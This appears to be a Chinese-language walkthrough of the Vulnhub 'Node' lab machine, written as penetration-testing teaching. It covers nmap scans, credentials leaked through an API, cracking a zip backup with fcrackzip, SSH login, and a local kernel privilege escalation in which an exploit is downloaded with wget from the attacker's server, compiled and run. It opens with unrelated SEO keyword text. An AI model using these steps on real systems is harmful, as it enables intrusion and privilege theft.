什么是网站设计种类,微信营销的优势,seo推广费用,一般通过yyut本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文#xff0c;读者将能够对渗透Vulnhub系列node靶机有一定的了解 一、信息收集阶段
靶机下载地址#xff1a;https://www.vulnhub.com/entry/node-1,252 因为靶机为本地部署虚拟机网段#xff0c;查看dhcp地址池设置。得… 本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文读者将能够对渗透Vulnhub系列node靶机有一定的了解 一、信息收集阶段
靶机下载地址https://www.vulnhub.com/entry/node-1,252 因为靶机为本地部署虚拟机网段查看dhcp地址池设置。得到信息IP为192.168.220.0/24
1、扫描网段发现主机
nmap -sP 192.168.220.0/24
# 快速验证网段存活主机2、扫描主机详细信息
nmap -sT -sV -sC 192.168.220.131
#-sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
#-sV 尝试确定每个打开端口上运行的服务的版本
#-sC 使用默认的脚本扫描Script Scanning可以帮助发现更多的信息如漏洞、配置错误等3、登陆apache网站查看信息
http://192.168.220.131:3000/
#可能存在的用户名tom mark rastating4、查看网页源码 二、渗透阶段
1、依次登陆用户查看信息/下载文件
username:myP14ceAdm1nAcc0uNT
password:manchester2、查看/解密下载文件myplace.backup
cat myplace.backup
base64 -d myplace.backup ab.backup3、解密后的文件无法使用修改文件类型
file ab.backup #查看文件类型mv ab.backup ab.zip #修改文件类型4、解压压缩文件
unzip ab.zip5、 fcrackzip爆破压缩文件/查看文件内容
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt ab.zip
# pw magicwordcd var/www/myplace6、ssh登陆
ssh mark192.168.220.131
# 输入密码5AYRft73VtFpc84k三、提权阶段
1、查找suid权限
find / -perm -4000 -print 2/dev/null #查找SUID 权限的文件2、查看系统版本内核
uname -a
lsb_release -a3、搜索历史漏洞
searchsploit ubuntu 16.04 4、下载漏洞利用文件
searchsploit -m 44298.c 5、python开启http微服务
python -m http.server 80886、靶机下载exp
cd /tmp #切换到又权限的目录再下载
wget http://192.168.220.128:8088/44298.c7、编译exp
gcc 44298.c -o poc8、执行exp提权
./poc 四、总结
本次靶机主要通过网页主页源码查看到api文件导致账号密码信息泄露从而获取服务器普通用户权限再根据机器上的系统内核版本的信息搜集使用漏洞检索工具searchsploit利用exp进行提权。